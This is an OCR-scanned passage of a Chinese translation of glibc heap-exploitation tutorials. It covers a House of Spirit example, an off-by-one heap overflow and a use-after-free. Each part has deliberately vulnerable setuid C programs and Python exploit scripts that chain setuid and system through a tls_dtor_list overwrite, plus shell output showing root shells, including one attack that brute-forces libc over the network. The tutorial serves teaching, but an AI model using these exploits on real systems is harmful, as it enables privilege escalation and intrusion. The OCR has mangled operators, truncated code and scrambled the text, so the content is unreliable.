销 48 属于 fast 块 ， 对 应 的 fast bin (位 于 下 标 4) 会 被 获取 。fast binlist 的 第 
一 个 块 被 溢出 ， 并 返回 给 用 户 。 第 一 个 块 是 在 行 [4] 执行 过 程 中 添加 的 栈 区 
域 。 


行 [e] :覆盖 返回 地 址 
e 将 攻击 者 的 参数 argv[1] 复制 到 栈 区 域 (由 glibc malloc 返回 ) > € 


从 OxbffffdfO 位 置 开始 。 argv[1] 的 前 16 个 字 节 是 : 
o \xeb\x0e : JMP 14 字 节 。 
o  \XAL\XAL\XAL\XAL\XAL\XAL\XAL\XAL\XAL\XA1L : 卉 充 。 
o \xb8\xfd\xff\xbf : 储存 在 栈 上 的 返回 地 址 会 被 这 个 值 履 盖 。 因 此 
在 fvuln 执行 之 后 ，EIP 是 Oxbffffdb8 -- 这 个 位 置 包 含 JMP 指令 ， 


之 后 是 派生 shell 的 shellcode ° 
使 用 攻击 者 的 参数 执行 漏洞 程序 会 执行 shellcode， 像 这 样 : 


sploitfunQsploitfun-VirtualBox:-/Dropbox/sploitfun/heap overflow 
/Malloc-Maleficarum/hos$ gcc -g -fno-stack-protector -z norelro 
-z execstack -o vuln vuln.c -Wl,--rpath-/home/sploitfun/glibc/gl 
ibc-inst2.20/lib -Wl, --dynamic-linker=/home/sploitfun/glibc/glib 
c-inst2.20/lib/ld-linux.so.2 
sploitfunQsploitfun-VirtualBox:-/Dropbox/sploitfun/heap overflow 
/Malloc-Maleficarum/hos$ gcc -g -o exp exp.c 
sploitfunQsploitfun-VirtualBox:-/Dropbox/sploitfun/heap overflow 
/Malloc-Maleficarum/hos$ ./exp 


PTR1 
PTR1 


[ 0x804a008 ] 
[ oxbffffdfO ] 


AAAAAAAAAA????1?Ph//shh/bin??P??S? 

$ ls 

cmd exp exp.c print vuln vuln.c 

$ exit 
sploitfunQsploitfun-VirtualBox:-/Dropbox/sploitfun/heap overflow 
/Malloc-Maleficarum/hos$ 


保护 : 直到 现在 ， 没 有 添加 针对 这 个 技巧 的 任何 保护 。 这 个 技巧 能 帮助 我 们 利用 堆 
溢出 ， 即 使 它 使 用 最 新 的 glibc 编译 。 


House of Prime: TBU 


House of Lore: TBU 
BOE: 出 于 演示 目的 ， 所 有 漏洞 程序 都 不 使 用 下 列 Linux 保护 机 制 编译 : 


e ASLR 
e NX 
e RELRO ( € € 6 Aix) 


e The Malloc Maleficarum 


Off-By-One SH (AT) 


译 者 : 飞龙 
原文 : Off-By-One Vulnerability (Heap Based) 
预备 条 件 : 


1. Off-By-One 漏洞 (ATH) 
2. 理解 glibc malloc 


VM 配置 : Fedora 20 (x86) 
什么 是 Off-By-One 漏洞 ? 


在 这 篇 文章 中 提 到 过 ， 将 源 字符 串 复 制 到 目标 缓冲 区 可 能 造成 Off-By-One 7&8 > 
当 源 字符 串 的 长 度 等 于 目标 缓冲 区 长 度 的 时 候 。 
当 源 字符 串 的 长 度 等 于 目标 缓冲 区 长 度 的 时 候 ， 单 个 NULL 字符 会 复制 到 目标 缓冲 


区 的 上 方 。 因 此 由 于 目标 缓冲 区 位 于 堆 上 ， 单 个 NULL 字 节 会 覆盖 下 一 个 块 的 块头 
部 ， 并 且 这 会 导致 任意 代码 执行 。 


回顾 : 在 这 篇 文章 中 提 到 ， 在 每 个 用 户 请 求 堆 内 存 时 ， 扒 段 被 划分 为 多 个 块 。 每 个 
块 有 自己 的 块头 部 (由 malloc_chunk 表示 ) ° malloc chunk 结构 SATE 
个 元 素 : 


1. prev. size -- 2 前 一 个 块 空闲 ， 这 个 字段 包含 前 一 个 块 的 大 小 。 否 则 前 一 
个 块 是 分 配 的 ， 这 个 字段 包含 前 一 个 块 的 用 户 数 据 。 


2. size : 这 个 字符 包含 分 配 块 的 大 小 。 字 段 的 最 后 三 位 包含 标志 信 


gu, 


o PREV INUSE (P) 如 果 前 一 个 块 已 分 配 ， 会 设置 这 个 位 。 

o IS MMAPPED (M) 当 块 是 mmap 块 时 ， 会 设置 这 个 位 。 

o NON MAIN ARENA (N) 当 这 个 块 属于 线程 arena 时 ， 会 设置 这 个 位 。 
3. fd 指向 相同 bin 的 下 一 个 块 。 


4. bk 指向 相同 bin 的 上 一 个 块 。 
漏洞 代码 : 


//consolidate forward.c 
include <stdio.h> 
#include <string.h> 
#include <stdlib.h> 
#include <unistd.h> 
#include <sys/types.h> 
#include <sys/stat.h> 
#include «fcntl.h» 


#define SIZE 16 


int main(int argc, char* argv[]) 


d 


int fd = open("./inp file", O RDONLY); /* [1] */ 
if(fd -- -1) ( 

printf("File open error\n"); 

fflush(stdout); 

exit(-1); 

} 


if(strlen(argv[1])>1020) { 7* [2] *7 
printf("Buffer Overflow Attempt. Exiting...\n"); 
exit(-2); 

j 


char* tmp - malloc(20-4); /* [3] */ 
char* p = malloc(1024-4); /* [4] */ 
char* p2 malloc(1024-4); /* [5] */ 
char” p3 malloc(1024-4); /* [6] */ 


read(fd,tmp,SIZE); /* [7] */ 
strcpy(p2,argv[1]); /* [8] *7 


free(p); /* [9] */ 


编译 命令 : 


Zecho 0 > /proc/sys/kernel/randomize va space 
$gcc -o consolidate forward consolidate forward.c 
$sudo chown root consolidate forward 

$sudo chgrp root consolidate forward 

$sudo chmod +S consolidate forward 


ERS: 


出 于 我 们 的 演示 目的 ， 关 闭 了 ASLR。 如 果 你 也 想 要 绕 过 ASLR， 使 用 信息 泄露 
bug， 或 者 爆破 机 制 ， 在 这 篇 文章 中 描述 。 


上 述 漏洞 代码 的 行 [2] fe [8] 是 基于 堆 的 off-by-one Bw RA MILA ^ B ds HO 
区 的 长 度 是 1020， 因 此 长 度 为 1020 的 源 字符 串 可 能 导致 任意 代码 执行 。 


任意 代码 执行 如 何 实现 ? 


任意 代码 执行 ， 当 单个 NULL 字 节 和 覆盖 下 一 个 块 ( p3 ) 的 块头 部 时 实现 。 当 大 小 
为 1020 FF ( p2 ) 的 块 由 单个 字 节 溢出 时 ， 下 一 个 块 ( p3 ) 的 头 部 中 
的 size 的 最 低 字 节 会 被 NULL FPRA HHH prev_size 的 最 低 字 节 。 


为 什么 size 的 LSB 会 被 覆盖 ， 而 不 是 prev_size ? 


checked request2size 将 用 户 请 求 的 大 小 转换 为 可 用 大 小 (内 部 表示 的 大 

T) ， 因 为 需要 一 些 额 外 空间 来 储存 malloc chunk ， 并 且 也 出 于 对 齐 目 的 。 转 
换 实现 的 方式 是 ， 可 用 大 小 的 三 个 最 低位 始终 不 会 为 零 (也 就 是 8 的 倍数 ， 译 者 
i) ， 所 以 可 以 用 于 放置 标志 信息 P、M 和 N。 


因此 当 我 们 的 漏洞 代码 执行 malloc(1020) 时 ， 用 户 请 求 大 小 1020 字 节 会 转换 

A ((1020 + 4 + 7) & -7) 字 节 (内 部 表示 大 小 ) 。1020 字 节 的 分 配 块 的 富余 
量 仅仅 是 4 个 字 节 。 但 是 对 于 任何 分 配 块 ， 我 们 需要 8 字 节 的 块头 部 ， 以 便 储 

# prev size 和 size 信息 。 因 此 1024 字 节 的 前 八字 节 会 用 于 块头 部 ， 但 是 现 
在 我 们 只 剩 下 1016 (1024-8) 字 节 用 于 用 户 数 据 ， 而 不 是 1020 字 节 。 但 是 像 上 
@ prev size 定义 中 所 述 ， 如 果 上 一 个 块 ( p2 ) 已 分 配 ， 块 ( p3) 

的 prev size 字段 包含 用 户 数据 。 因 此 块 p3 的 prev size 位 于 这 个 1024 字 
节 的 分 配 块 p2 后 面 ， 并 包含 剩余 4 字 节 的 用 户 数 据 。 这 就 是 size 的 LSB 被 单 
个 NULL 3 A 3 mx prev size 的 原因 。 


堆 布局 


Off-By-One 漏洞 (ATÈ) 


0x806c000 0x806c000 


0x804bc18 


0x804bc18 


0x804b818 


0x804b818 0x804b430 


p2 
0x804b418 
0x804b418 


0x804b018 0x804b018 





0x804b000 0x804b000 





Heap Layout Heap Layout with attacker data 


注意 : 上 述 图 片 中 的 攻击 者 数据 会 在 下 面 的 “ 敌 盖 tls dtor list "一 节 中 解释 。 
现在 回 到 我 们 原始 的 问题 。 
任意 代码 执行 如 何 实现 ? 


现在 我 们 知道 了 ， 在 off-by-one 漏洞 中 ， 单 个 NULL 字 节 会 覆盖 下 一 个 块 
( p3 ) size 字段 的 LSB。 这 单个 NULL 字 节 的 溢出 意味 着 这 个 块 ( p3 ) 的 
标志 信息 被 清空 ， 也 就 是 被 溢出 块 ( p2 ) 变 成 空闲 块 ， 虽 然 它 处 于 分 配 状态 。 当 
被 溢出 块 ( p2 ) 的 标志 已 被 清空 ， 这 个 不 一 致 的 状态 让 glibc 代码 unlink 这 个 块 
( p2 ) ， 它 已 经 在 分 配 状态 。 
在 这 篇 文章 中 我 们 看 到 ，unlink 一 个 已 经 处 于 分 配 状态 的 块 ， 会 导致 任意 代码 执 
行 ， 因 为 任何 四 个 字 节 的 内 存 区 域 都 能 被 攻击 者 的 数据 覆盖 。 但 是 在 同一 篇 文章 
中 ， 我 们 也 看 到 ，unlink 技巧 已 经 废弃 ， 因 为 glibc 近 几 年 来 变 得 更 加 可 靠 。 具 体 
来 说 ， 因 为 “双向 链表 损坏 ”的 条 件 ， 任 意 代码 执行 时 不 可 能 的 。 


但 是 在 2014 $X > Google 的 Project Zero 小 组 找到 了 一 种 方式 ， 来 成 功 绕 过 “ 双 
向 链表 损坏 ”的 条 件 ， 通 过 unlink large 块 。 
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unlink : 


#define unlink(P, BK, FD) { 

FD = P->fd; 

BK = P->bk; 

// Primary circular double linked list hardening - Run time ch 
eck 

if (__builtin_expect (FD->bk !- P || BK-»fd !- P, 0)) /* [1] */ 


malloc_printerr (check_action, "corrupted double-linked list" 
, P); 
else ( 
// If we have bypassed primary circular double linked list ha 
rdening, below two lines helps us to overwrite any 4 byte memory 
region with arbitrary data!! 
FD->bk = BK; /* [2] */ 
BK->fd = FD; /* [3] */ 
if (!in smallbin range (P->size) 
Së _ builtin expect (P->fd_nextsize !- NULL, 0)) { 
// Secondary circular double linked list hardening - Debug a 
ssert 
assert (P->fd_nextsize->bk_nextsize == P); /* [4] */ 
assert (P->bk_nextsize->fd_nextsize == P); /* [5] */ 
if (FD->fd_nextsize == NULL) { 
if (P->fd_nextsize == P) 
FD->fd_nextsize = FD->bk_nextsize = FD; 
else { 
FD->fd_nextsize = P->fd_nextsize; 
FD->bk_nextsize = P->bk_nextsize; 
P->fd_nextsize->bk_nextsize = FD; 
P->bk_nextsize->fd_nextsize FD; 


} 

} else { 

// If we have bypassed secondary circular double linked lis 
t hardening, below two lines helps us to overwrite any 4 byte me 
mory region with arbitrary data!! 

P->fd_nextsize->bk_nextsize 

P->bk_nextsize->fd_nextsize 


P->bk_nextsize; /* [6] */ 
P-»fd nextsize; /* [7] */ 


B —————————————————ÀÁ9Ó«]: te 


在 glibc malloc 中 ， 主 要 的 环形 双向 链表 由 malloc chunk 的 fd 和 bk 字段 维 

护 ， 而 次 要 的 环形 双向 链表 

由 malloc chunk 的 fd nextsize 和 bk nextsize 字段 维护 。 双 向 链表 的 加 固 
看 起 来 用 在 主要 (AT [1] ) 和 次 要 (fT [4] 和 [5] ) 的 双向 链表 上 ， 但 是 次 要 
的 环形 双向 链表 的 加 固 ， 只 是 个 调试 断言 语句 (不 像 主 要 双向 链表 加 固 那 样 ， 是 运 


行 时 检查 ) ， 它 在 生产 构建 中 没有 被 编译 (至 少 在 fedora x86 F) 。 因 此 ， 次 要 的 
环形 双向 链表 的 加 固 (fr [4] 和 [5] ) 并 不 重要 ， 这 让 我 们 能 够 向 任意 4 个 字 
节 的 内 存 区 域 写 入 任何 数据 (47 [6] 和 [7] ) ° 


然而 还 有 一 些 东西 应 该 解释 ， 所 以 让 我 们 更 详细 地 看 看 ，unlink large 块 如 何 导 致 任 
意 代 码 执行 。 由 于 攻击 者 已 经 控制 了 -- 要 被 释放 的 large X s c X 
了 malloc_chunk 元 素 ， 像 这 样 : 


fd 应 该 指向 被 释放 的 块 ， 来 绕 过 主要 环形 双向 链表 的 加 固 。 
bk 也 应 该 指向 被 释放 的 块 ， 来 绕 过 主要 环形 双向 链表 的 加 固 。 
fd nextsize 应 该 指向 free got addr - 0x14 。 

bk nextsize 应 该 指向 system addr 。 


但 是 根据 行 [6] 和 [7] ， 需 要 让 fd nextsize 和 bk nextsize 都 是 可 写 
的 。 fd_nextsize 是 可 写 的 ，( 因 为 它 指向 了 free got addr - 0x14 ) ， 但 
是 bk nextsize 不 是 可 写 的 ， 因 为 他 指向 了 system addr CR 

于 libc.so 的 文本 段 。 让 fd nextsize 和 bk nextsize 都 可 写 的 问题 ， 可 以 
wit tls dtor list 来 解决 。 


SS tls dtor list 


tls dtor list 是 个 线程 局 部 的 变量 ， 它 包含 函数 指针 的 列表 ， 它 们 在 exit 过 
程 中 调用 。 call tls dtors 遍历 tls dtor list 并 依次 调用 函数 。 因 此 如 
果 我 们 可 以 将 tls dtor list JE x 928 Ab > CA 
4 system 和 system arg ， 来 替代 dtor list 的 func 和 obj ， 我 们 就 能 调 
用 System 。 









tls dtor list: 
func obj map next 
wenn | oema | | wu 
0x804b428 0x804b42c 0x804b430 0x804b434 


所 以 现在 攻击 者 需要 履 盖 要 被 释放 的 large 块 的 malloc chunk 元 素 ， 像 这 样 : 


fd 应 该 指向 被 释放 的 块 ， 来 绕 过 主要 环形 双向 链表 的 加 固 。 
bk 也 应 该 指向 被 释放 的 块 ， 来 绕 过 主要 环形 双向 链表 的 加 固 。 
fd nextsize 应 该 指向 tls dtor list - 0x14 ° 

bk nextsize 应 该 指向 含有 dtor list 元 素 的 堆 地 址 。 


fd nextsize 可 写 的 问题 解决 了 ， 因 为 tls_dtor list 属于 libc.so HTS 
区 段 ， 并 且 通 过 反 汇 编 _call_tls_dtors() * tls dtor list 的 地 址 
为 9xb7fe86d4 。 


bk nextsize 可 写 的 问题 也 解决 了 ， 因 为 它 指向 堆 地 址 。 


使 用 所 有 这 些 信 息 ， 让 我 们 编写 利用 程序 来 攻击 漏洞 二 进 制 的 "前 向 合并 ”。 
利用 代码 : 


Zexp try.py 

#!/usr/bin/env python 
import struct 

from subprocess import call 


fd 0x0804b418 

bk = 0x0804b418 

fd nextsize = Oxb7fe86c0 
bk nextsize - 0x804b430 
system = 0x4e0a86e0 

sh - 0x80482ce 


#endianess convertion 
def conv(num): 
return struct.pack("«I",num(fd) 
buf += conv(bk) 
buf += conv(fd nextsize) 
buf += conv(bk nextsize) 
buf += conv(system) 
buf += conv(sh) 
buf += "A" * 996 


print "Calling vulnerable program" 
call(["./consolidate forward", buf]) 


执行 上 述 利 用 代码 不 会 向 我 们 提供 root shell。 它 向 我 们 提供 了 一 个 运行 在 我 们 的 权 
限 级 别 的 bash shell » & 


$ python -c 'print "A"*16' > inp file 

$ python exp try.py 

Calling vulnerable program 

sh-4.2$ id 

uid-1000(sploitfun) gid-1000(sploitfun) groups-1000(sploitfun),1 
O(wheel) context-unconfined u:unconfined r:unconfined t:s0-s0:cO 
.c1023 

sh-4.2$ exit 

exit 

$ 


为 什么 不 能 获得 root shell ? 


当 uid != euid 时 ， /bin/bash 会 丢弃 权限 。 我 们 的 二 进 制 “ 前 向 合并 ”的 丨 实 
uid 是 1000， 但 是 它 的 有 效 uid 是 O° Ast’ system 调用 时 ，bash 会 丢弃 权 
Ro E SE uid 不 等 于 有 效 Uid。 为 了 解决 这 个 问题 ， 我 们 需要 在 system 之 前 


调用 setuid(0) °> AX call tls dtors() 依次 遍历 tls dtor list ， 我 们 
需要 将 setuid 和 system 链接 ， 以 便 获 得 root shell ° 


完整 的 利用 代码 : 


4gen file.py 
#!/usr/bin/env python 
import struct 


Zdtor list 

setuid - 0x4e123e30 
setuid arg - 0x0 

mp = 0x804b020 

nxt = 0x804b430 


#endianess convertion 
def conv(num): 
return struct.pack("«I",num(setuid) 
tst += conv(setuid arg) 
tst += conv(mp) 
tst += conv(nxt) 


Print Est 


#exp . py 

#!/usr/bin/env python 
import struct 

from subprocess import call 


0x0804b418 
0x0804b418 

fd nextsize = Oxb7fe86c0 
bk nextsize - 0x804b008 
system = 0x4e0a86e0 

sh - 0x80482ce 


#endianess convertion 
def conv(num): 
return struct.pack("«I",num(fd) 
buf += conv(bk) 
buf += conv(fd nextsize) 
buf += conv(bk nextsize) 
buf += conv(system) 
buf += conv(sh) 
buf += "A" * 996 


print "Calling vulnerable program" 
call(["./consolidate forward", buf]) 


执行 上 述 利 用 代码 会 给 我 们 root shell 。 


$ python gen file.py > inp file 

$ python exp.py 

Calling vulnerable program 

sh-4.24 id 

uid=0(root) gid-1000(sploitfun) groups=0(root),10(wheel),1000(sp 
loitfun) context-unconfined u:unconfined r:unconfined t:s0-s0:cO 
.C1023 

sh-4.24 exit 

exit 

$ 


我 们 的 off-by-one 漏洞 代码 会 向 前 合并 块 ， 也 可 以 向 后 合并 。 这 种 向 后 合并 off-by- 
one 漏洞 代码 也 可 以 利用 。 


释放 后 使 用 


EX: 飞龙 
原文 : Use-After-Free 
预备 条 件 : 


1. Off-By-One 漏洞 (ATH) 
2. 理解 glibc malloc 


VM 配置 : Fedora 20 (x86) 
什么 是 释放 后 使 用 (UAF) ? 


继续 使 用 已 经 被 释放 的 堆 内 存 指针 叫做 释放 后 使 用 。 这 个 漏洞 会 导致 任意 代码 执 
行 。 


漏洞 代码 : 


Zinclude <stdio.h> 

#include <string.h> 

#include <unistd.h> 

#define BUFSIZE1 1020 

#define BUFSIZE2 ((BUFSIZE1/2) - 4) 


int main(int argc, char **argv) { 


char* name = malloc(12); /* [1] */ 
char* details = malloc(12); /* [2] */ 
strncpy(name, argv[1], 12-1); /* [3] */ 
free(details); /* [4] */ 

free(name); /* [5] */ 

printf("Welcome %s\n",name); /* [6] */ 
fflush(stdout); 


char tmp = (char =) malioeı(12),. 77 [717 

char* pi (char *) malloc(BUFSIZE1); /* [8] */ 
char* p2 (char *) malloc(BUFSIZE1); /* [9] *7 
free(p2); /* [10] */ 

char p2_1 (char *) malloc(BUFSIZE2); /* [11] 57 
char” p2_ 2 (char i) malloc(BUFSTZE2).7/ 121557 


printf("Enter your region\n"); 
fflush(stdout); 
read(0, p2, BUFSIZE1-1); /* [13] */ 
printf("Region:%s\n",p2); 
free(p1); /* [14] */ 


编译 命令 : 


Zecho 2 > /proc/sys/kernel/randomize va space 
$gcc -o vuln vuln.c 

$sudo chown root vuln 

$sudo chgrp root vuln 

$sudo chmod +s vuln 


注意 : 不 像 上 一 篇 文章 ，ASLR 在 这 里 是 打开 的 。 所 以 现在 让 我 们 利用 UAF R 
洞 ， 因 为 ASLR 打开 了 ， 让 我 们 使 用 信息 泄露 和 爆破 技巧 来 绕 过 它 。 


上 面 的 漏洞 代码 包含 两 个 UAF 漏洞 ， 位 于 行 [6] fe [13] 。 它 们 的 堆 内 存在 
行 [5] 和 [10] 释放 ， 但 是 它们 的 指针 即使 在 释放 后 也 使 用 ， 在 

行 [6] 和 [13] 。 行 [6] 的 UAF 会 导致 信息 泄露 ， 而 行 [13] 的 UAF 导致 任 
意 代码 执行 。 


什么 是 信息 泄露 ? 攻击 者 如 何 利 用 它 ? 


在 我 们 的 漏洞 代码 (AT [6] ) 中 ， 被 泄露 的 信息 是 堆 地 址 。 这 个 泄露 的 对 地 址 会 
帮助 攻击 者 轻易 计算 出 随机 化 堆 段 的 基地 址 ， 因 此 绕 过 ASLR e 


为 了 理解 堆 地 址 如 何 泄露 的 ， 让 我 们 首先 理解 漏洞 代码 的 前 半 部 分 。 


行 [1] A name PACT 16 字 节 的 堆 内 存 区 域 。 

47 [2] 位 details 分 配 了 16 字 节 的 堆 内 存 区 域 。 

行 [3] 将 程序 的 参数 1 ( argv[1] ) 复制 到 堆 内 存 区 域 name 中 。 

行 [4] 和 [5] 将 堆 内 存 区 域 name 和 details 释放 给 glibc malloc ° 
ff [6] 的 printf 在 释放 后 使 用 name 指针 ， 这 会 导致 堆 地 址 的 泄露 。 


阅读 预备 条 件 中 的 文章 之 后 ， 我 们 知道 ， 对 应 name 和 details 指针 的 块 都 是 
fast 块 ， 并 且 ， 当 这 些 fast 块 被 释放 时 ， 它 们 储存 在 fast bin 的 下 标 0 处 。 我 们 也 
知道 ， 每 个 fast bin 都 包含 一 个 空闲 块 的 单 链表 。 因 此 对 于 我 们 的 示例 来 说 ，fast 
bin 下 标 0 处 的 单 链 表 是 这 样 : 


main arena.fastbinsY[0] ---> 'name chunk address' ---> 'details 
chunk address' ---> NULL 


由 于 这 个 单 链表 。 name 的 前 四 个 字 节 包含 details chunk 地 址 ， 因 此 在 打 
fF name 时 ， details chunk 地 址 首先 被 打印 。 我 们 可 以 从 堆 布 局 中 知 
道 ， details_chunk 位 于 堆 基 址 的 0x10 偏 移 处 。 因 此 从 泄露 的 堆 地 址 减 去 
0x10， 我 们 就 得 到 了 堆 的 基 址 。 

如 何 实现 任意 代码 执行 ? 
现在 获得 随机 化 堆 段 的 基 址 之 后 ， 让 我 们 看 看 如 何 通过 理解 漏洞 代码 的 后 半 部 分 ， 
来 实现 任意 代码 执行 。 


e íf [7] A tmp 分 配 了 16 字 节 的 堆 内 存 区 域 。 


释放 后 使 用 


代码 执行 。 


行 [8] 为 pi 分 配 了 1024 字 节 的 堆 内 存 区 域 。 
行 [9] 为 p2 分 配 了 1024 字 节 的 堆 内 存 区 域 。 
行 [10] 将 堆 内 存 区 域 p2 释放 给 glibc malloc ° 
行 [11] 为 p21 分 配 了 512 字 节 的 堆 内 存 区 域 。 
行 [12] A p2 2 分 配 了 512 字 节 的 堆 内 存 区 域 。 
行 [13] 的 读 取 在 释放 后 使 用 了 p2 指针 。 
行 [14] 将 堆 内 存 区 域 ni 释放 给 glibc malloc。 这 会 在 程序 退出 时 导致 任意 


阅读 预备 条 件 中 的 文章 之 后 ， 我 们 知道 ， 当 p2 释放 给 glibc malloc 时 ， 它 会 和 
top 块 合并 。 之 后 为 p2_1 请 求 内存 时 ， 它 会 从 top 块 分 配 p2 和 p21 BAM 
同 的 堆 地 址 。 之 后 为 p2 2 请 求 内 存 时 ， 它 也 从 top 块 分 配 -- p2 2 是 p2 之 后 
的 512 个 字 节 。 因 此 在 行 [13] T» p2 指针 在 释放 后 使 用 时 ， 攻 击 者 控制 的 数 
据 (最 大 1019 FF) 会 复制 到 p2 1 ， 它 的 大 小 只 有 512 字 节 ， 因 此 剩余 的 攻击 
者 数据 会 覆盖 下 一 个 块 p2 2 ， 允 许 攻 击 者 覆盖 下 一 个 块头 部 的 size 字段 。 


堆 布 局 : 


0x806c000 


0x804b020 


Heap Layout @ line [2] 





0x806c000 


0x804b810 


0x804b410 | prev size | 


0x804b010 


0x804b000 


Heap Layout @ line [9] 






0x806c000 


0x804b810 


p2_2 






size=0x200 
ox804b610 AAAA | 


Heap Layout @ line [13] with 
attacker data 


我 们 在 预备 条 件 中 的 文章 中 看 到 ， 如 果 攻 击 者 成 功 履 盖 了 下 一 个 块 的 size 字段 的 
LSB， 它 就 可 以 坎 骗 glibc malloc 来 unlink 块 p2_1 ， 即 使 它 处 于 分 配 状态 。 在 相 
同文 章 中 ， 我 们 也 看 到 ， 当 攻击 者 精心 构造 伪造 的 块头 部 时 ，unlink 一 个 处 于 已 分 
配 状态 的 large 块 会 导致 任意 代码 执行 。 攻 击 者 可 以 像 这 样 构造 伪造 的 块头 部 : 
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e fd 应 该 指向 释放 的 块 地 址 。 从 堆 的 布局 中 我 们 可 以 看 到 ， p21 位 于 偏 移 
0x410。 所 
以 fd = heap base address + 0x410 * heap base address 从 信息 泄露 
的 bug 中 获取 。 


e bk 也 应 该 指向 释放 的 块 地 址 。 从 堆 的 布局 中 我 们 可 以 看 到 ， p2_1 位 于 偏 移 
0x410。 所 
以 fd = heap base address + 0x410 * heap base address 从 信息 泄露 
的 bug 中 获取 。 


e fd nextsize 应 该 指向 tls dtor list - 0x14 ° tls dtor list 属于 
glibc 的 私有 匿名 映射 区 段 ， 它 是 随机 化 的 。 因 此 为 了 绕 过 这 个 随机 化 ， 让 我 们 
使 用 爆破 技巧 ， 就 像 下 面 的 利用 代码 那样 。 


e bk nextsize 应 该 指向 堆 内 存 ， 该 内 存 包含 dtor list 元 
素 。 system 的 dtor list 由 攻击 者 注入 在 这 个 伪造 的 块头 部 后 面 ， 
而 setuid 的 dtor list 由 攻击 者 注入 在 p2 2 扒 内 存 区 域内 。 从 扒 布 局 中 
我 们 了 解 到 ， system 和 setuid 的 dtor list 位 于 偏 移 0x428 和 0x618 
处 。 


使 用 所 有 这 些 信息 ， 让 我 们 编写 利用 程序 来 攻击 漏洞 二 进 制 vuln 
利用 代码 : 


#exp. py 
#!/usr/bin/env python 
import struct 

import sys 

import telnetlib 
import time 


ip = '127.0.0.1' 
port = 1234 


def conv(num): return struct.pack("<I 
def send(data): 

global con 

con.write(data) 

return con.read_until('\n') 


print "** Bruteforcing libc base address**" 
libc base addr - 0xb756a000 

fd nextsize = (libc base addr - 0x1000) + Ox6cO 
system = libc base addr + 0x3e6e0 

system arg = 0x80482ae 

size - 0x200 

setuid = libc base addr + 0xb9e30 

setuid arg = 0x0 


while True: 
time.sleep(4) 


con - telnetlib.Telnet(ip, port) 

laddress = con.read_until('\n') 

laddress - laddress[8:12] 

heap. addr tup = struct.unpack("«I", laddress) 
heap. addr = heap addr tup[0] 

print "** Leaked heap addresses : [0x%x] **" %(heap_addr) 
heap base addr = heap addr - 0x10 

fd = heap base addr + 0x410 

bk - fd 

bk nextsize = heap base addr + 0x618 

mp = heap base addr + 0x18 

nxt = heap base addr + 0x428 


print "** Constructing fake chunk to overwrite tls dtor list**" 
fake chunk - conv(fd) 

fake chunk += conv(bk) 

fake chunk += conv(fd nextsize) 

fake chunk += conv(bk nextsize) 

fake chunk += conv(system) 

fake chunk += conv(system arg) 

fake chunk += "A" * 484 

fake chunk += conv(size) 

fake chunk += conv(setuid) 

fake chunk += conv(setuid arg) 

fake chunk += conv(mp) 

fake chunk += conv(nxt) 

print "** Successful tls dtor list overwrite gives us shell!!** 


send(fake chunk) 


try: 
con.interact() 
except: 
exit(0) 


由 于 在 爆破 技巧 中 ， 我 们 需要 尝试 多 次 (直到 成 功 ) 。 让 我 们 将 我 们 的 漏洞 二 进 
制 vuln 运行 为 网 络 服务 器 ， 并 使 用 Shell 教程 来 确保 崩溃 时 自动 重启 : 


#vuln.sh 

#!/bin/sh 

nc_process_id=$(pidof nc) 

while : 

do 
if [[ -z $nc process id ]]; then 
echo "(Re)starting nc..." 
nc -1 -p 1234 -c "./vuln sploitfun" 
else 
echo “ne 3s running..." 
EP 

done 


执行 上 述 利 用 代码 会 给 我 们 root shell。 好 的 。 


Shell-1$./vuln.sh 
Shell-2$python exp.py 


** Leaked heap addresses : [0x889d010] ** 

** Constructing fake chunk to overwrite tls dtor list** 

** Successfull tls dtor list overwrite gives us shell!!** 
*** Connection closed by remote host *** 

** Leaked heap addresses : [0x895d010] ** 

** Constructing fake chunk to overwrite tls dtor list** 

** Successfull tls dtor list overwrite gives us shell!!** 
*** Connection closed by remote host *** 

id 

uid=0(root) gid-1000(bala) groups=0(root),10(wheel),1000(bala) 
ontext-unconfined u:unconfined r:unconfined t:s0-s0:c0.c1023 
exit 

** Leaked heap addresses : [0x890c010] ** 

** Constructing fake chunk to overwrite tls dtor list** 

** Successfull tls dtor list overwrite gives us shell!!** 
*** Connection closed by remote host *** 


~ 
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